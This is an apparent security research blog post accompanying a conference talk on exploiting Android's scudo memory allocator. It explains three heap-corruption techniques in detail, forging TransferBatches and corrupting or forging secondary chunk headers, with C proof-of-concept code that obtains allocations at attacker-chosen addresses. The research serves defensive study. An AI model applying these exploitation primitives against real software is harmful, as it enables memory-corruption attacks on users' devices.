Scudo Allocator Exploitation

This is a post made to accompany my Bsides Canberra 2023 talk under the same name (+ slides and PoCs) - as often a blog is preferable to a video / offers new insight. I will say that I am very late in writing this - the research was primarily done in June 2023, and then debuted September 2023. Since this research was done, scudo has already had significant changes - primarily the addition of a quarantine for secondary chunks. Hopefully this blog still serves as a useful source!

I will note that this doesn’t aim to be an explanation of scudo’s internals, and that the talk does a better job of that / other articles (such as un1fuzz’s, though there are other articles just generally on scudo internals).

Last thing - this is based on the Android config of scudo.

Existing Resources

The main existing research (at the time of writing):

un1fuzz - Great overview of internals, + techniques for double-returning a chunk/getting a chunk at an arbitrary address.

infosectbr - On breaking the checksums used to verify chunk headers

Both are great articles, so thanks to the authors for writing them. I will note that some of the techniques listed here build off un1fuzz’s techniques, so reading their articles will help.

Techniques

Forging TransferBatches

This is by far the most complex exploit in this blog, and by far my least favourite. To fully understand it’ll probably require a lot of deep-diving into scudo’s code. The later two techniques are more robust, and easier to apply. Nonetheless, in cases without secondary chunks, it is useful.

The first goal is to forge a TransferBatch - that is, to have a chunk we can write to allocated as a TransferBatch This requires an Out-of-Bound write to corrupt the header. We additionally need to corrupt the forged TransferBatch, which could be a Use-After-Free, or we could spray chunks in the same region so that some of those chunks look like ‘part’ of the Transferbatch (if theyre allocated after the forged chunk).

Let’s start on the exploit. First, we allocate, then free the ‘target’ chunk, so that it enters quarantine. Then, we corrupt it’s header. A chunk’s header typically looks like:

typedef u64 PackedHeader;
// Update the 'Mask' constants to reflect changes in this structure.
struct UnpackedHeader {
  uptr ClassId : 8;
  u8 State : 2;
  // Origin if State == Allocated, or WasZeroed otherwise.
  u8 OriginOrWasZeroed : 2;
  uptr SizeOrUnusedBytes : 20;
  uptr Offset : 16;
  uptr Checksum : 16;
};

We want to set it’s ClassId to 0. When a chunk is being freed, a ClassId of 0 indicates a chunk from the secondary allocator, and is sent to the corresponding free. (which we don’t want to happen). However, otherwise, a ClassId of 0 is reserved for internal use with TransferBatch-es, which look like:

struct TransferBatch {                                                                                                      
    TransferBatch *Next;

   private:
    CompactPtrT Batch[MaxNumCached];
    u16 Count;
};

Thus, when a chunk in quarantine is de-quarantined, and returned to the appropriate region’s freelist - if it has a ClassId of 0 in it’s header, it goes to Region 0’s freelist.

CRITICAL NOTE - the order of regions is randomised, thus region 0 may be before, or after, any given region. If the chunk we are smuggling in is in a region that is before region 0 in memory, then this exploit will SIGSEGV and fail. The talk would be more detailed, or try the PoC and explore with a debugger. This is a major flaw of this technique, which’ll happen 50% of the time (given the ordering of regions, as said, is random).

So, after corrupting the target’s header whilst it’s in quarantine, we flush the quarantine via allocating+freeing many chunks. The size of the quarantines is known from the config, so we know exactly how many allocations to get our ‘target’ flushed out.

Next, we need to cause a TransferBatch allocation. When a region’s cache of chunks is empty, it’s refilled via a TransferBatch - but if there are none of those, it creates some TransferBatches for the region. Simply put, we need to allocate chunks to exhaust a region’s cache to trigger our forged chunk to be made into a proper TransferBatch.

In the PoC, this is done bunch of code as flushing the quarantine.

Now - the struct reponsible for storing a region’s cached chunk is called PerClass. And these are all stored in an array, in the big struct that’s essentially all of the data for the primary allocator. After this array is a field called Allocator - which controls a lot of the actual allocator behaviour. We want to corrupt the Allocator pointer to a region of memory we control.

 struct scudo::SizeClassAllocatorLocalCache
        private:
            static const scudo::uptr NumClasses;
            static const scudo::uptr BatchClassId;
            scudo::SizeClassAllocatorLocalCache::PerClass PerClassArray[45];
            scudo::LocalStats Stats;
            SizeClassAllocator *Allocator;
        ...
}

How we plan to do this is, when a TransferBatch replenishes a PerClass’ cache of chunks, it’s essentially a memcpy into the PerClass, with the count == TransferBatch.count.

Thus, we corrupt TransferBatch.count to be large enough that the memcpy overwrites Allocator, as well as putting what we’re setting Allocator to as an ‘entry’ in the TransferBatch. We also add a 0 for later

    //Corrupt count for our TransferBatch!! :))
    ((unsigned int *)chunk)[11] = 0x40a;

    // Corrupt Allocator of SizeClassAllocatorLocalCache
    chunk[0x202] = (unsigned long)fakeAllocator;
    chunk[0x203] = 0;

More allocations from the region our TransferBatch was allocated for will cause the refill to occur. Now, we control Allocator.

SizeClassAllocator (the type of Allocator) has an array of structs called RegionInfo, which define the info for each region. Namely, the field RegionBeg of RegionInfo is critically important.

For the region we corrupted, within our fake allocator we’ll set RegionBeg to be our target address - 0x10. (The 0x10 is for the header). Then, our allocation, which initially triggered the refill, will return our target address.

Technically, the 0 we wrote above is the offset from the region that the chunk we’re allocating is at. With an offset of 0, we nullify this pretty much.

And like thus, we have a chunk at our target address.

Full Poc here

Corrupting Secondary Chunks to get Arb-write

Secondary chunks have an additional, ‘secondary’ header in addition to the primary header.

 struct alignas(Max<uptr>(archSupportsMemoryTagging()
                            ? archMemoryTagGranuleSize()
                            : 1,
                        1U << SCUDO_MIN_ALIGNMENT_LOG)) Header {
   LargeBlock::Header *Prev;
   LargeBlock::Header *Next;
   uptr CommitBase;
   uptr CommitSize;
   MemMapT MemMap;
 };

The field we are mainly concerced about is CommitBase. This is a pointer, which defines the ‘base’ of the allocation. Assuming a scenario where we can corrupt a secondary chunk’s header, if we can set CommitBase to point to where we want to corrupt, then upon freeing and reallocating that secondary chunk, it will be at our target address.

There is one downside - the header section of the chunk (which takes up 80 bytes before the user-allocation), must obviously be writeable. Meaning if you’re trying to write to the start of a section, with unwriteable memory before it, a SIGSEGV will be caused. In the related PoC, the variable target is our target, but we also define the variable big so that there’s a writeable region before target. Without big, we would SIGSEGV trying to get a chunk at target.

Some deeper details - The code to determine the address for the user-allocation and the header-position is:

const uptr CommitBase = Entries[I].CommitBase;
if (!CommitBase)
    continue;
const uptr CommitSize = Entries[I].CommitSize;
const uptr AllocPos =
    roundDown(CommitBase + CommitSize - Size, Alignment);                               
HeaderPos =
    AllocPos - Chunk::getHeaderSize() - LargeBlock::getHeaderSize();

Assuming we corrupt the header, we control CommitBase (the most important part) + CommitSize. Additionally Size is the # of bytes we’re allcoation + 80, which we may or may not control.

The short of it is, we need to balance these so AllocPos == target_addr. In the related PoC, we set CommitSize to be 80 more than we allocate to account for the header, and put CommitBase to be 80 bytes before our target.

PoC (+ here):

#include <stdio.h>
#include <stdlib.h>

unsigned long big[0x2000] = {0};
char target[64];

int main() {
    unsigned long * bigChunk = malloc(0x20000);

    bigChunk[-7] = 0x20050; //CommitSize
    bigChunk[-8] = (unsigned long)target - 0x50;  //CommitBase
                                                  
    free(bigChunk);
    unsigned long * forgedChunk = malloc(0x20000);

    printf("Address of target is %p\n", target);
    printf("Address of forged chunk is %p\n", forgedChunk);
}

Forging Secondary Chunks to get Arb-Write

Similar to how we can corrupt secondary chunks to lead to arbitrary-writes, we can also forge secondary chunks. The only important differentiation from a secondary chunk and a normal chunk is the addition of a secondary header, which lies before the primary header.

Assuming we can allocate and write to several primary chunks of the same region, its pretty easy to: 1. Allocate one designated chunk 2. Corrupt it’s header to set the region to 0 3. Spray however many extra chunks in the same region. The contents of these chunks should all be fake secondary-headers 4. Free and reallocate the designated chunk

The scudo allocator randomizes chunks of a region in batches, so that allocations arent contiguous. However, if we allocate enough chunks, and make them all have the fake secondary-header, then one will be allocated before the designated chunk, making it look like the designated chunk has a secondary header.

Then its the same principles of setting CommitBase and CommitSize accordingly to get a chunk at your designated address.

PoC (full version here):

...
enum AllocationState { Available = 0, Allocated = 1, Quarantined = 2};

int make_state(int classId, enum AllocationState state, int size) {
    return classId | (state << 8) | (size << 12);
}

unsigned long big[0x2000] = {0};
char globalTarget[64];

int main() {
    ...

    unsigned long * chunk = malloc(0x40);
    size_t normal_cksum = (*(chunk-2)) >> 48;

    int old_state = make_state(4, Allocated, 0x40);
    int new_state = make_state(0, Allocated, 0x40);

    size_t corrupted_cksum = find_cksum(normal_cksum, old_state, new_state);
    (*(chunk-2)) = (corrupted_cksum << 48) | new_state;

    for (int i = 0 ; i < 0x1000 ; i++) {
        unsigned long * tmp = malloc(0x40);

        tmp[0] = 0;
        tmp[1] = 0;
        tmp[2] = globalTarget - 0x50;
        tmp[3] = 0x20050;
    }

    free(chunk);

    unsigned long * forged = malloc(0x20000);
    printf("forged chunk is at %p\n", forged);
    printf("target is at %p\n", globalTarget);
}

Misc

These are things that I’ve found useful when exploiting the allocator but aren’t really deep/novel enough to be called ‘techniques’

Secondary Chunk Info-leak

Lots of effort went into ensuring that for the ‘primary’ chunk header, no pointers were included, thus in the event of an Out-of-Bound read, an info-leak wouldnt occur (ignoring the user-contents).

The secondary header, however, does contain pointers derived from mmap, as most secondary chunks are mmapped. Since mmap chunks are often contiguous with shared libraries, this can give you an info-leak for those libraries.

It’s important to note that the header is before user-content in memory, so one either needs to read before the user-content (e.g with a negative index), or to read ‘between’ secondary chunks. However, there is a guard page after each secondary chunk (generally), which makes this difficult.

Aside: To avoid unneeded memory allocations, the secondary allocator does cache and re-use chunks, so maybe one could: 1. Allocate a massive secondary chunk 2. Free it 3. Allocate two smaller secondary chunks such thay they can both fit inside the first

I’m not sure off the top of my head whether there’d then be a guard page? ¯\_(ツ)_/¯

Corrupting shared libraries.

Similarly to the info-leak, because mmaped chunks may be contiguous to shared libraries, you might be able to use an Out-of-Bounds write on a secondary chunk to corrupt shared library content.

Cross-Cache chunks

Similar to the ‘Forging TransferBatch’ technique, nothing specifies we must corrupt the region to be 0. We can set it to be any region we want, thus smuggling that chunk into a different region. We’ll still SIGSEGV if the target region if before the origin region of the chunk, and it’s overall much more situational.

Conclusion

Thanks for reading! I hope you found the article useful. If you have any questions, send them to me on twitter or (preferably) discord. Both can be found here